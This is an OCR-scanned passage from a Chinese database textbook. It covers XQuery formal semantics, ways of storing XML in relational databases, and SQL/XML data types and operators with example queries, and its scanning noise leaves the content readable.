(1IDIV 0=1) AND (2=3 ) (IDIV 是 预定 义 的 整数 除法 函数 ) 
如 果 左 边 表达 式 先 求 值 ， 会 引发 错误 (被 零 除 )， 导 致 整个 表达 式 会 产生 错误 (没有 必要 
再 求 右边 表达 式 的 值 )。 相 反 ， 如 果 右 边 表达 式 先 求 值 ， 整 个 表达 式 将 被 取 值 为 假 (没有 必 
要 再 求 左 边 表达 式 的 值 )。 
类 似 地 ， 在 表达 式 Expr OR Expr 中 ， 如 果 任 一 表达 式 引发 错误 或 者 取 值 为 真 ， 整 个 表 
达 式 将 引发 错误 或 取 值 为 真 。 其 形式 化 语义 写作 : 
dynEnv |- Expor = true i IN {1, 2} 
dynEnv |- Expr, OR Expr, = true 
dynEnv |- Expr, = RAISES Error i IN {1, 2} 
dynEnv |- Expr, OR Expr; = RAISES Error 


其 他 逻辑 表达 式 的 动态 推导 规则 为 : 
dynEnv |- Expn = true dynEnv |- Expr, = brue 
dynEnv |- Expr, AND Expr, = true 
dynEnv |- Expr, = false dynEnv |- Expr, = false 


dynEnv |- Expr, OR Expr, = false 


LET 表达 式 ”下面 的 推导 规则 阐述 了 环境 如 何 更 新 且 更 新 的 环境 如 何在 LET 表达 式 中 使 用 : 
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dynEnv I- Expr, = Value 
statEnv |- VarName of var expands to Variable dynEnv + varValue(Variable 一 Value;) |- Exprs = Value, 


dynEnv I- LET VarName: = Expr, RETURN Expr; = Values 


这 个 规则 按 如 下 方式 理解 : 在 第 一 个 假设 中 ， 表 达 式 被 绑 定 到 LET 变量 ，Expri 求 值 后 
产生 Valuei。 在 第 二 个 假设 中 ， 静 态 类 型 环境 首先 被 扩展 为 带 有 LET 变量 。 在 第 三 个 假设 
中 ， 动 态 环境 被 绑 定 到 Value 的 LET 变量 扩展 ， 该 扩展 的 环境 又 用 来 求 表达 式 Expr 的 值 
产生 Value;。 

FOR 表达 式 ”FOR 表达 式 的 求 值 区 分 出 迭代 表达 式 取 值 为 空 序列 的 情况 ， 此 时 整个 表 
达 式 取 值 为 空 序列 。 我 们 省 略 该 规则 ， 直 接 考 虑 第 二 个 规则 : 

dynEnv |- Expr; = ltem,, ...， ltem, 


statEnv |- VarName of var expands to Variable 
dynEnv + varValue(Variable = ltem'’) |- Expp = Value 


dynEnyv + varValue(Variable = ltem) |- Expr; = Value， 
dynEnv |- FOR VarName IN Expr, RETURN Expr, = Value ..., Value, 


该 规则 这 样 理解 : 在 第 一 个 假设 中 ， 和 迭代 表达 式 Expri 计 值 产生 序列 Itemi，…，Itemn。 
在 第 二 个 假设 中 ， 静 态 类 型 环境 首先 被 扩展 为 带 有 FOR 变量 。 在 余下 的 假设 中 ， 对 每 一 项 
Itemi， 动 态 环境 被 绑 定 到 Itemi 的 FOR 变量 扩展 ， 然 后 该 扩展 环境 用 来 求 表达 式 Exprm 的 值 
产生 Valuei， 这 些 值 连接 起 来 产生 结果 序列 。 

关于 XQuery 形式 化 语义 更 全 面 的 描述 超出 了 本 书 的 范围 ， 感 兴趣 的 读者 请 参考 形式 化 
语义 文档 (W3C，2007i;2010i)。 


30.6 XML 和 数据 库 


随 着 采用 XML 格式 数据 量 的 增 大 ， 存 储 、 检 索 和 查询 数据 的 需求 也 在 增加 。 可 以 预 
期 将 存在 两 种 主要 模型 :以 数据 为 中 心 的 和 以 文档 为 中 心 的 。 在 以 数据 为 中 心 的 模型 ( data- 
centric model) 中 ，XML 被 用 作 结 构 化 数据 存储 和 交换 的 格式 ， 以 规则 的 次 序 出 现 ， 并 且 很 
可 能 是 被 机 器 处 理 而 不 是 人 来 阅读 。 在 以 数据 为 中 心 的 模型 中 ,XML 偶尔 作为 数据 被 存储 
和 传输 ， 也 可 能 用 到 其 他 格式 。 这 种 情况 下 ， 数 据 可 能 存储 在 关系 、 对 象 - 关系 或 者 面向 对 
象 的 DBMS 中 。 例 如 ，XML 已 经 被 完全 集成 到 了 Oracle 中 ,我 们 将 在 下 一 节 中 讨论 到 。 

在 以 文档 为 中 心 的 模型 (document-centric model) 中 ， 文 档 设 计 用 来 给 人 类 交流 (例如 ， 
书 、 报 纸 和 电子 邮件 )。 由 于 这 种 信息 的 特性 ， 大 多 数 数据 无 规律 也 不 完全 ， 并 且 其 结构 可 
能 迅速 地 或 者 不 可 预期 地 改变 。 不 幸 的 是 ， 关 系 、 对 象 -关系 和 面向 对 象 的 DBMS 都 不 能 
特别 好 地 处 理 这 种 特性 的 数据 。 内 容 管 理 系统 是 处 理 这 种 类 型 文档 非常 有 用 的 工具 。 对 这 样 
的 系统 ， 现 在 已 经 有 纯 XML 数据 库 (native XML database，NXD ) 。 

这 种 二 元 区 分 并 不 是 绝对 的 。 数 据 ， 尤 其 是 半 结 构 化 数据 ， 也 能 够 被 存储 在 纯 XML 数 
据 库 中 ， 当 要 求 的 XML 特性 较 少 时 也 可 能 存储 在 传统 数据 库 中 。 此 外 ， 这 两 种 类 型 系统 之 
间 的 分 界线 正 变 得 没 那么 清晰 ， 由 于 更 多 传统 的 DBMS 增加 了 纯 XML 能 力 ， 而 纯 XML 数 
据 库 也 支持 文档 片段 存储 在 传统 数据 库 中 。 本 节 分 析 在 XML 和 关系 DBMS 之 间 映 射 的 一 些 
问题 以 及 怎样 扩展 SQL 来 支持 XML。 我 们 也 简要 讨论 纯 XML DBMS。 本 章 最 后 一 节 将 分 
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析 如 何 扩 展 Oracle 来 支持 XML。 


30.6.1 在 数据 库 中 存储 XML 


讨论 在 传统 DBMS 中 存储 XML 文档 的 一 些 通用 方法 之 前 ， 简 要 列举 需要 处 理 的 XML 
文档 的 一 些 类 型 : 

e 由 对 应 的 XML Schema 管理 并 强制 赋予 了 类 型 的 XML。 

e 由 另 一 模式 语言 ， 例 如 DTD 或 RELAX-NG， 管理 并 强制 赋予 了 类 型 的 XML。 
被 多 个 模式 管理 的 XML， 或 者 仅 一 个 模式 但 经 常 改变 。 
无 模式 的 XML。 
可 能 包含 标记 文本 的 XML， 标记 文 本 的 逻辑 单位 覆盖 多 个 元 素 (例如 语句 )。 
带 有 结构 、 排 序 和 有 意义 的 空白 间隔 的 XML， 在 以 后 的 日 子 可 能 希望 从 数据 库 中 检 
索 内 容 确 切 相 同 的 XML。 

e 需要 更 新 和 基于 上 下 文 和 关联 进行 查询 的 XML。 

有 四 种 通用 方法 用 来 在 关系 数据 库 中 存储 XML 文档 : 

e 将 XML 作为 一 个 元 组 中 某 个 属性 的 值 存储 。 

e 以 碎片 的 形式 跨 多 个 属性 和 关系 存储 XML。 

e 以 模式 无 关 的 形式 存储 XML。 

e 以 分 析 所 得 形式 存储 XML， 即 ， 将 XML 转换 成 内 部 格式 ， 例 如 Infoset 或 者 PSVI 

表示 ， 然 后 存储 该 表示 。 

这 些 方法 并 不 相互 排斥 。 例 如 ， 可 以 存储 一 些 碎 化 的 XML 为 一 个 关系 中 的 属性 ， 但 某 
些 结 点 保持 不 变 ， 作 为 同一 或 另外 关系 的 某 个 属性 的 值 存储 。 

在 属性 中 存储 XML 

利用 这 个 方法 ， 过 去 XML 可 能 被 存储 在 数据 类 型 为 character large object (CLOB) 的 属 
性 中 。 最 近 有 一 些 系统 实现 了 一 个 新 的 纯 XML 数据 类 型 。 在 Oracle 中 ， 该 数据 类 型 被 称 为 
XML Type (尽管 在 低层 存储 可 能 是 CLOB )。 正 如 下 一 节 要 讨论 的 ， 现 在 SQL 标准 预定 义 
了 XML 数据 类 型 ,但 是 没有 详细 描述 满足 XML 数据 类 型 需求 的 存储 结构 。 未 加 工 的 XML 
文档 以 顺序 的 形式 存储 ， 这 样 能 高 效 地 将 它们 插入 数据 库 同时 以 原始 形式 检索 出 来 。 这 个 方 
法 也 使 得 为 了 支持 上 下 文 和 相关 性 搜索 ， 而 对 文档 进行 全 文 索引 相对 容易 些 。 然 而 ， 对 于 一 
般 查 询 和 索引 ， 人 性 能 存在 问题 ， 这 可 能 需要 在 执行 时 进行 分 析 。 此 外 ， 更 新 通常 需要 用 新 文 
档 替 换 整个 XML 文档 ， 而 不 是 仅仅 修改 XML 中 变动 的 部 分 。 

以 碎片 的 形式 存储 XML 

使 用 该 方法 ，XML 文档 被 分 解 成 其 组 成 元 素 ， 这 些 数据 再 分 布 到 一 个 或 多 个 关系 中 的 
若干 属性 上 。 用 来 做 分 解 的 术语 是 撕 碎 (shredding)。 存 储 撕 碎 后 的 文档 可 能 使 得 索引 特定 
元 素 的 值 更 加 容易 ， 假 若 这 些 元 素 存储 在 它们 自己 的 属性 里 。 也 可 以 额外 增加 一 些 数据 关注 
XML 层次 特性 ， 这 使 得 以 后 重新 组 织 原始 结构 和 排序 成 为 可 能 ,并且 人 允许 更 新 XML。 使 用 
该 方法 我 们 也 不 得 不 创建 合适 的 数据 库 结构 。 

数据 库 模式 的 创建 ”在 转移 数据 之 前 ， 我 们 必须 设计 和 创建 一 个 合适 的 数据 库 模 式 来 存 
储 数据 。 如 果 存 在 与 XML 关联 的 模式 ， 可 以 从 该 模式 导出 数据 库 结 构 。 这 里 我 们 讨论 两 种 
主要 的 方法 : 

e 关系 映射 。 
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e 对 象 - 关系 映射 。 

关系 映射 (relational mapping) 方法 从 XML 文档 的 根 结 点 开始 并 且 将 该 元 素 同 一 个 关 
系 关联 起 来 。 对 该 元 素 的 每 个 孩子 ， 都 要 决策 是 把 它 作为 该 关系 中 的 一 个 属性 还 是 创建 一 个 
新 关系 (在 这 种 情况 下 ， 某 个 元 素 将 被 选 作 主 关键 字 / 外 部 关键 字 或 人 工 创建 一 个 关键 字 )。 
做 决策 的 一 个 简单 的 规则 是 ， 如 果 元 素 能 够 被 重复 ， 例 如 ， 如 果 maxOccurs > 1， 则 创建 一 
个 新 的 关系 。 此 外 ， 还 须 决策 一 个 可 选 的 元 素 是 在 作为 其 父 的 元 素 关 系 里 描述 ， 还 是 另外 创 
建 一 个 新 的 关系 ( 若 为 后 者 ， 运 行 时 需要 额外 的 连接 操作 将 这 两 个 关系 链接 在 一 起 )。 该 方 
法 还 能 试图 识别 出 在 XML 多 个 位 置 出 现 的 相同 元 素 ， 并 为 这 样 的 元 素 创 建 关系 。 

对 象 - 关 系 映射 ( object-relational mapping) 方法 将 复杂 的 元 素 类 型 模拟 为 类 /类 型 ， 
(在 Sun 的 Java XML 绑 定 结构 或 JAXB 出 现 之 后 ， 这 通常 被 称 为 XML 数据 绑 定 ) 包括 带 属 
性 的 元 素 类 型 、 元 素 内 容 和 混合 内 容 。 男 外 ， 它 将 简单 元 素 类 型 模拟 为 标量 属性 ， 包 括 属 
性 、PCDATA 和 只 有 PCDATA 的 内 容 。 类 /类 型 和 标量 属性 将 被 映射 到 SQL:2011 类 型 和 
表格 ， 如 同 第 9 章 所 讨论 的 。 对 该 方法 的 进一步 信息 感 兴趣 的 读者 可 以 参考 Bourret 的 论文 
( 2001，2004 )。 无 论 选 择 哪 一 种 映射 ， 都 需要 手工 修改 设计 结果 ， 以 纠正 由 于 XML 文档 中 
出 现 的 任意 和 复杂 结构 带 来 的 偏差 。 

另 一 方面 ， 如 果 不 存在 XML Schema， 数 据 库 模式 也 可 以 从 一 个 或 多 个 样本 XML 文档 
的 内 容 中 导出 ， 当 然 不 能 保证 未 来 文档 与 样本 文档 结构 一 致 。 这 种 情况 下 ， 前 述 将 XML 直 
接 存储 在 关系 属性 中 的 方法 可 能 更 好 些 。 一 个 替代 的 方法 是 考虑 下 面 即将 讨论 的 模式 无 关 表 
示 法 。 

模式 无 关 的 表示 法 

一 个 替代 的 方法 是 使 用 模式 无 关 的 表示 法 ， 既 不 从 关联 的 模式 也 不 从 XML 本 身 的 结 
构 和 内 容 中 推导 XML 的 关系 型 结构 。 例 如 ， 在 30.3.1 节 中 我 们 已 经 看 到 文档 对 象 模型 
(Document Object Model) 能 够 用 于 描述 XML 数据 的 结构 。 对 图 30-5 中 XML 文档 ， 图 30- 
26a 显示 了 从 DOM 描述 中 创建 的 关系 。 属 性 parentID 是 递归 的 外 部 关键 字 ， 人 允许 每 个 元 组 
(代表 树 中 一 个 结 点 ) 指向 其 父亲 。 由 于 XML 是 树 结构 ， 每 个 结 点 只 有 一 个 父亲 。rootID 属 
性 允许 一 个 针对 特定 结 点 的 查询 链 回 到 它 的 文档 结 点 。 

虽然 这 是 一 种 XML 模式 无 关 的 表示 ， 但 当 搜 索 特 定 路 径 时 结构 的 递归 特性 会 导致 性 能 
问题 。 为 了 解决 该 问题 ， 可 创建 一 个 逆 规 范 的 索引 结构 ， 包 含 路 径 表 达 式 和 从 结 点 到 其 父亲 
结 点 的 链接 ， 如 图 30-26b。 
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图 30-26 


White 


322 甸 八 部 分 Web 与 DBMS 





一 旦 合适 的 结构 被 创建 ,， XML 进入 数据 库 ， 我 们 就 能 够 利用 SQL (可 能 加 上 一 些 扩 展 ) 
来 查询 数据 。 下 一 节 中 我 们 将 研究 SQL:2011 标准 中 专门 加 入 用 来 支持 XML 的 新 特性 。 


30.6.2 XML 和 SQL 


尽管 XML 令 人 兴奋 ， 但 大 多 数 运转 中 的 商业 数据 ， 甚 至 关于 新 的 基于 Web 应 用 的 数 
据 都 存储 在 (对象 -) 关系 DBMS 中 。 因 为 RDBMS 的 可 靠 性 、 可 扩展 性 、 工 具 和 性 能 好 ， 
这 在 可 见 的 未 来 是 不 可 能 改变 的 。 因 此 ， 如 果 XML 要 实现 其 潜能 ， 需 要 一 些 机 制 以 XML 
文档 形式 发 布 关 系 型 数据 。SQL:2003 、SQL:2008 和 SQL:2011 标准 都 定义 了 扩展 用 以 发 布 
XML ， 均 可 参见 SQL/XML (ISO，2011b)。 特 别 地 ，SQL/XML 包含 : 

e 一 种 新 的 纯 XML 数据 类 型 XML， 使 得 XML 文档 能 被 看 作 关系 表 中 列 的 值 、 用 户 

自 定义 类 型 的 属性 的 值 、 变 量 值 和 函数 参数 的 值 。 

。 该 类 型 的 一 组 操作 。 

e 从 关系 数据 到 XML 的 一 组 隐 含 的 映射 。 

除了 下 面 我 们 讨论 的 少量 例外 ， 该 标准 关于 逆 过 程 ， 即 如 何 打 碎 XML 数据 成 SQL 形 
式 未 作 任 何 规定 。 下 面 我 们 分 析 这 些 扩 展 。 

SQL/XML 和 XQuery 

在 SQL/XML:2003 中 ，SQL/XML 数据 模型 是 基于 W3C 的 Infoset (先前 讨论 过 )， 主 要 
是 因为 那 时 XQuery1.0 和 XPath2.0 的 数据 模型 (XDM) 没有 充分 考虑 稳定 性 。 可 由 于 Infoset 
只 认可 三 个 原子 类 型 : 布尔 型 、 双 精度 和 字符 串 ， 导 致 表示 相当 受 限 。 然 而 ， 新 发 行 的 SQL/ 
XML 标准 与 XDM 保持 一 致 ， 正 如 前 节 所 见 ，XDM 已 拥有 在 XML Schema 中 定义 的 各 种 原 
子 类 型 ， 加 上 五 种 新 类 型 。 这 意味 着 任意 一 个 XML 值 也 是 一 个 XQuery 序列 。 

新 的 XML 数据 类 型 

新 数据 类 型 被 简称 作 XML， 它 能 被 用 于 定义 表 中 列 、 用 户 自 定义 类 型 的 属性 、 变 量 和 
函数 参数 。 该 数据 类 型 的 合法 值 包含 空 值 、SQL/XML 信息 项 集 (由 一 个 根 项 目 构 成 ) 和 任 
意 其 他 通过 递归 遍历 这 些 项 目的 属性 可 以 到 达 的 SQL/XML 信息 项 。SQL/XML 信息 项 一 般 
是 XML Infoset 定义 的 一 个 信息 项 。 在 列 定义 中 ， 可 选 子 句 能 用 于 指定 命名 空间 和 /或 者 二 
进 制 编码 模式 (BASE64 or HEX)。 

在 SQLXML:2011 中 , 一 个 XML 值 (value) 要 不 是 一 个 空 值 要 不 是 一 个 XQuery 序列 。 
尽管 SQL/XML:2011 保留 了 SQL/XML:2003 非 参数 化 的 XML 数据 类 型 ， 但 该 标准 将 XML 类 
型 分 成 了 三 个 基本 子 类 型 (SEQUENCE 、CONTENT 和 DOCUMENT)， 它 们 分 级 相关 并 与 另 
外 三 个 二 级 子 类 型 (ANY、UNTYPED、XMLSCHEMA) 相 联 系 : 

e XML (SEQUENCE) : 每 一 个 XML 都 是 该 子 类 型 的 实例 。 尽 管 如 此 ， 并 不 是 所 有 

XML 值 都 是 其 他 任意 一 个 参数 类 型 的 实例 。 
XML (CONTENT (ANY)): 一 个 XML (SEQUENCE)， 若 其 每 一 个 值 或 为 空 或 为 
一 个 XQuery 文档 结 点 (包括 该 文档 结 点 的 任何 子 结 点 )， 则 是 这 个 子 类 型 的 一 个 
实例 。 作 为 这 种 子 类 型 实例 的 XML 值 不 限定 为 有 效 ， 甚至 合式 的 文档 (例如 有 几 
个 元 素 孩 子 的 文档 结 点 )。 这 样 的 值 可 以 作为 某 些 查询 的 中 间 结 果 ， 之 后 再 归结 为 
合式 的 文档 结 点 。 注 意 作 为 这 种 子 类 型 的 一 个 实例 ， 每 一 个 XQuery 元 素 结 点 都 
被 包含 在 根 结 点 具有 类 型 xdt:untyped 的 那 棵 树 中 ， 并 且 该 树 的 每 个 属性 都 有 类 型 
xdt:untypedAtomic。 
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XML (CONTENT (UNTYPED)): 一 个 XML (CONTENT (ANY))， 其 XML 值 
未 与 可 用 于 确定 文件 的 元 素 和 属性 更 精确 类 型 信息 的 模式 验证 相关 联 。 如 果 XML 
值 进 行 了 某 种 形式 的 模式 验证 ， 并 且 至 少 有 一 个 获得 类 型 标注 ， 则 该 值 是 XML 
(CONTENT (ANY) ) 而 不 是 XML (CONTENT (UNTYPED)) 的 实例 。 

XML (CONTENT (XMLSCHMA)): 一 个 XML (CONTENT (ANY) )， 其 每 一 个 被 
包含 在 以 文档 结 点 为 根 结 点 的 树 中 XQuery 元 素 结 点 按照 某 个 模式 都 是 有 效 的 。 

XML (DOCUMENT (ANY)) : 带 一 个 这 样 的 文档 结 点 的 XML (CONTENT (ANY ))， 
它 恰好 有 一 个 XQuery 元 素 结 点 、 零 个 或 多 个 XQuery 注解 结 点 、 零 个 或 多 个 XQuery 
处 理 指令 结 点 。 

XML (DOCUMENT (UNTYPED )): 一 个 XML (CONTENT (UNTYPED))， 其 每 个 
XML 值 或 为 NULL 或 为 这 样 的 文档 结 点 ， 它 恰好 有 一 个 XQuery 元 素 结 点 、 零 个 或 
多 个 XQuery 注解 结 点 、 零 个 或 多 个 XQuery 处 理 指 令 结 点 。 

XML (DOCUMENT (XMLSCHEMA)): 一 个 XML (DOCUMENT (ANY)), 其 


每 个 XML 值 或 为 NULL 或 为 具有 类 型 XML (DOCUMENT (ANY) ) 的 值 ， 并 且 按 照 
以 下 至 少 一 条 是 有 效 的 : 


四 XML Schema S。 
田 XML Schema S 中 的 XML 命名 空间 N。 
田 XML Schema S 中 的 全 局 元 素 声 明 模 式 组 件 E。 


| 例 30.10 入 用 XML 数据 类 型 创建 表 
创建 表 保 存 作为 XML data 的 staff 数据 。 


CREATE TABLE XMLStaff( 


docNo CHAR(4), docDate DATE, staffData XML， 
PRIMARY KEY docNo); 


通常 ， 利 用 INSERT 声明 能 够 向 该 表 中 插入 一 整 行 ， 例 如 : 


INSERT INTO XMLStaf VALUES (‘DOO01’, DATE 2012-12-01” XML(‘<STAFF 
branchNo = "B005"> 


< STAFFNO>SL21</STAFFNO> 

<POSITION> Manager</POSITION> 

<DOB>1945-10-01</DOB> 

<SALARY>30000</SALARY> </STAFF>’)); 《€ 


定义 了 如 下 几 个 操作 符 ， 用 来 产生 XML 值 : 


XMLELEMENT : 产生 一 个 XML 值 ， 它 以 单个 XQuery 元 素 作 为 XQuery 文档 结 点 
的 孩子 。 该 元 素 可 能 有 零 个 或 多 个 用 XMLATTRIBUTES 子 句 指定 的 属性 。 
XMLFOREST : 产生 有 一 系列 XQuery 元 素 的 XML 值 ， 这 些 元 素 作 为 XQuery 文档 
结 点 的 孩子 。 


e XMLCONCAT: 并 置 XML 值 的 列表 。 
e XMLPARSE: 对 字符 串 执行 非 确认 分 析 后 产生 一 个 XML 值 。 


XMLCOMMENT : 产生 一 个 XML 值 和 单个 XQuery 注释 结 点 ， 且 可 能 作为 一 个 
XQuery 文档 结 点 的 子 结 点 。 

XMLPI : 产生 一 个 带 单个 XQuery 处 理 指 令 结 点 的 XML 值 ， 可 能 作为 一 个 XQuery 
文档 结 点 的 子 结 点 。 
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XMLDOCUMENT: 产生 一 个 带 单个 XQuery 文档 结 点 的 XML 值 。 

XMLQUERY : 产生 一 个 带 单个 XQuery 文本 结 点 的 XML 值 ， 可 能 作为 一 个 XQuery 

文档 结 点 的 子 结 点 。 

XMLVALIDATE : 根据 一 个 XML Schema (或 目标 命名 空间 ) 验证 XML 值 ， 返 回 一 

个 带 类 型 标注 的 新 的 XML 值 。 

XMLCAST: 指定 一 个 数据 转换 ， 其 源 或 目标 类 型 均 是 一 个 XML 类 型 。 

e XMLTABLE: 产生 一 个 包含 由 XML 值 导出 数据 的 SQL 虚 表 ， 函 数 在 其 上 作用 。 

SQL/XML 还 定义 了 以 下 新 谓词 : 

e IS [NOT] DOCUMENT : 确定 XML 值 是 否 满足 XML 文档 的 (SQL/XML) 标准 
( 即 一 个 XQuery 文档 结 点 ， 其 孩子 中 确切 包含 一 个 XQuery 元 素 结 点 ， 零 个 或 多 个 
XQuery 注释 结 点 ， 以 及 零 个 或 多 个 XQuery 处 理 指令 )。 

e IS [NOT] CONTENT: 确定 XML 值 是 否 满 足 XML 内 容 (SQL/XML) 标准 。 

e XMLEXISTS : 测试 一 个 非 空 的 XQuery 序列 。 当 包含 的 XQuery 表达 式 返 回 除 空 序 
列 ( 假 ) 或 SQL NULL 值 (未 知 ) 外 的 任何 东西 时 返回 true。 

e IS [NOT] VALID : 根据 注册 的 XML Schema (或 目标 命名 空间 ) 来 确定 一 个 XML 值 
是 否 有 效 ， 返 回 真 / 假 且 不 改变 XML 值 本 身 。 

两 个 有 用 的 函数 是 : 

e XMLSERIALIZE: 由 XML 值 产生 字符 串 或 二 进 制 串 。 

。 XMLAGG: 一 个 聚合 阴 数 ， 由 元 素 集 产生 一 个 元 素 的 森林 。 

现在 提供 这 些 操 作 符 的 例子 。 


| 例 30.11 3》 使 用 XML 操作 符 

(1) 列 出 所 有 工资 高 于 人 20 000 的 员工 ， 用 XML 元 素描 述 ， 包 含 员工 的 姓名 和 作为 属 
性 的 分 公司 号 。 

用 图 4-3 中 的 Staff 表格 ,该 查询 可 以 描述 为 : 

SELECT staffNo, XMLELEMENT (NAME "STAFF", 

fName || '" || IName, 
XMLATTRIBUTES (branchNo AS "branchNumber") AS "staffXMLCol" 

FROM Staff 

WHERE salary > 20000; 

XMLELEMENT 使 用 NAME 关键 字 来 命名 XML 元 素 (该 例 中 的 STAFF)， 并 且 详细 说 
明了 元 素 中 出 现 的 数据 值 (fName 和 1Name 列 的 并 置 )。 我 们 也 使 用 了 XMLATTRIBUTES 
操作 符 来 指定 分 公司 号 作为 该 元 素 的 属性 ， 并 且 利用 AS 子 名 给 它 一 个 合适 的 名 称 。 如 果 
AS 子 名 被 指定 ， 属 性 在 列 (branchNo) 后 被 命名 。 该 查询 的 结果 如 表 30-5 所 示 。 嵌 套 的 元 
素 通过 菊 套 的 XMLELEMENT 操作 符 创建 。 注 意 元 素 仅 仅 当 该 列 有 非 空 值 时 才 出 现 。 


表 30-5 例 30.11 (1 ) 的 结果 表 
staffXMLCol 
<STAFF branchNumber = "B005">John White</STAFF> 


staffNo 
SL21 
SG5 





<STAFF branchNumber = "B003">Susan Brand</STAFF> 


(2) 对 每 个 分 公司 ， 列 出 其 所 有 员工 的 姓名 ， 每 个 描述 为 一 个 XML 元 素 。 
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SELECT XMLELEMENT (NAME "BRANCH", 
XMLATTRIBUTES (branchNo AS “branchNumber )， 


XMLAGG ( 
XMLELEMENT (NAME "STAFF "， 
fName || || IName) 
ORDER BY fName || “|| IName 


) 
) AS "branchXMLCol" 
FROM Staff 
GROUP BY branchNo; 
这 种 情况 下 ， 我 们 希望 通过 branchNo 将 Sta 任 表 聚 合 ， 然 后 在 每 一 组 内 列举 员工 。 我 们 
使 用 XMLAGG 聚合 函数 来 完成 这 项 工作 。 注 意 ORDER BY 子 名 的 使 用 ， 它 按 员 工 姓 名 的 字 
母 序 排列 元 素 。 表 30-6 中 显示 了 结果 表 。 


表 30-6 例 30.11 ( 2 ) 结果 表 


branchXMLCol branchXMLCol 
<BRANCH branchNumber = "B003"> <STAFF>Julie Lee</STAFF> 
<STAFF>Ann Beech</STAFF> <STAFF>John White</STAFF> 
<STAFF>Susan Brand</STAFF> </BRANCH> 
<STAFF>David Ford</STAFF> <BRANCH branchNumber = "B007"> 
</BRANCH> <STAFF>Mary Howe</STAFF> 
<BRANCH branchNumber = "B005"> </BRANCH> 


«<« 

XMLQUERY 的 用 途 是 计 值 一 个 XQuery 表达 式 并 返回 结果 给 SQL 应 用 程序 。XQuery 

表达 式 本 身 可 以 标识 这 个 也 许 用 XQuery 中 的 fn:doc0) 函数 计 值 得 到 的 XML 值 ， 这 个 XML 
值 可 以 作为 参数 传递 给 XMLQUERY 调用 。XMLQUERY 的 基本 语法 是 : 


XMLQUERY (XQuery-expression 
[PASSING {BY REF | BY VALUE} argument-list] 
[RETURNING {CONTENT | SEQUENCE} [{BY REF | BY 
VALUE}}BY REF | BY VALUE] 
{NULL ON EMPTY | EMPTY ON EMPTY)}) 
XQuery-expression 是 一 个 包含 XQuery 表达 式 的 字符 串 文字 。argument-list 是 一 个 用 逗 
号 分 隔 的 参数 列表 ， 其 中 每 个 参数 提供 了 一 个 SQL 值 (可 能 是 XML 子 类 型 之 一 的 一 个 值 ) 


与 一 个 在 XQuery-expression 中 声明 的 XQuery 全 局 变量 的 绑 定 。 每 个 参数 的 语法 形 如 : 
value-expression AS identifier [BY REF | BY VALUEI] 


value-expression 的 值 是 绑 定 到 参数 的 值 ， 这 由 identifier 标识 。 如 果 指 定 了 BY REF， 
那么 一 个 到 值 的 引用 绑 定 到 变量 上 ; 如 果 指 定 了 BY VALUE ， 则 值 的 副本 直接 绑 定 到 变量 。 
在 argument-list 之 前 指定 的 默认 的 参数 传递 机 制 应 用 于 每 个 既 没 指定 BY REF 也 没 指定 BY 
VALUE 的 参数 。 如 果 value-expression 的 类 型 不 是 XML 类 型 ， 那 么 不 能 指定 传递 机 制 〈 且 
该 值 被 直接 绑 定 到 变量 )。 对 于 使 用 参数 作为 对 XQuery 全 局 变量 的 绑 定 存在 一 种 可 能 的 例 
-外 : 至 多 一 个 参数 可 以 被 用 于 传递 上 下 文 项 (该 上 下 文 要 用 于 计算 XQuery 表达 式 的 值 ) 使 
用 示例 语法 ， 但 不 带 AS identifier 子 句 。 在 这 个 具体 情况 下 ,该 上 下 文 项 要 么 是 SQL NULL 
值 ， 要 么 是 XML (SEQUENCE) 的 一 个 实例 ， 其 序列 长 度 为 一 项 。 
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不 同 于 XMLCOMMENT 和 XMLPI， 从 XMLQUERY 返回 的 值 可 以 是 对 结果 的 引用 或 
结果 值 的 副本 。 然 而 ， 返 回 值 的 类 型 与 选择 通过 引用 还 是 通过 值 返回 之 间 存 在 相互 作用 : 如 
果 返 回 类 型 是 XML ( COMMENT)， 那 么 返回 机 制 隐 含 为 BY VALUE (但 不 能 被 明确 指定 )。 
如 果 指 定 RETURNING COMMENT ， 则 结果 在 通过 值 返回 前 被 序列 化 。 

最 后 的 子 句 描述 了 XMLQUERY 处 理 空 结果 序列 的 方式 ， 作 为 空 序列 (EMPTY ON 
EMPTY ) 或 者 将 空 序列 转换 为 SQL NULL 值 (NULL ON EMPTY )。 下 列 这 个 例子 说 明了 
XMLQUERY 的 使 用 。 

SQL/ XML : 2003 专注 于 将 关系 数据 映射 为 XML 数据 ， 直 接 存储 和 检索 XML 文档 。 
在 SQL/ XML : 2011，XMLTABLE 伪 函 数 可 以 将 XML 数据 转换 成 关系 数据 。XMLTABLE 
产生 一 个 包含 由 XML 导出 数据 的 SQL 虚 表 ， 伪 函数 在 其 上 作用 。 


| 例 30.12 了》 使 用 XMLQUERY 

返回 工资 高 于 £20 000 的 员工 的 工资 

SELECT 
XMLQUERY (FOR $S IN //STAFF/SALARY WHERE $S > $SAL 

AND $S/@branchNo = "BOO5" RETURN $5’ 

PASSING BY VALUE ‘15000’ AS $SAL, staffData 
RETURNING SEQUENCE BY VALUE 
NULL ON EMPTY) AS highSalaries 

FROM XMLStaff; 

该 XQuery 语句 类 似 于 例 30.4 中 的 第 二 项 ， 其 中 WHERE 子 句 使 用 变量 $SAL 参数 化 。 
PASSING 子 名 为 $SAL (15000 ) 提供 一 个 值 ， 也 指定 了 上 下 文 项 staffData。RETURNING 
子 句 指出 输出 将 是 一 个 XQuery 序列 。 《人 《 

XMLTABLE 也 数 的 格式 为 : 

XMLTABLE ( 

[XML-namespace-declaration,] 
XQuery-expression [PASSING argument-list] 
COLUMNS XML-table-column-definitions) 

其 中 XML-namespace-declaration 说 明了 对 该 伪 函 数 计 值 时 所 用 命名 空间 。 而 XQuery- 
expression ( 行 模式 ) 是 一 个 XQuery 表达 式 的 字符 串 文字 表示 ，argument-list 类 似 前 面 已 
描述 的 XMLQUERY 伪 函 数 使 用 的 参数 列表 ， 只 是 列表 中 的 每 个 参数 总 是 通过 引用 传递 。 
XQuery-expression 被 用 于 标识 XML 值 ， 这 些 值 将 用 于 构造 由 XMLTABLE 生成 的 虚 表 中 
的 SQL 行 。 XML-table-column-definitions 为 用 逗号 分 隔 的 列 定 义 ( 列 模式 ) 的 列表 ， 这 
些 列 定 义 是 由 普通 的 SQL 表 的 列 定义 派生 而 来 。 不 过 也 还 能 创建 一 个 特殊 的 列 ， 一 个 序号 
列 (ordinality column)， 可 以 用 来 记 住 一 个 项 目 原来 在 XQuery 序列 中 的 位 置 ， 使 用 下 面 的 
语法 : 

column-name FOR ORDINALITY 

用 于 定义 一 个 正规 的 SQL 列 的 语法 稍微 复杂 一 些 : 

column-name data-type [BY REF | BY VALUE] [default-clause] [PATH 

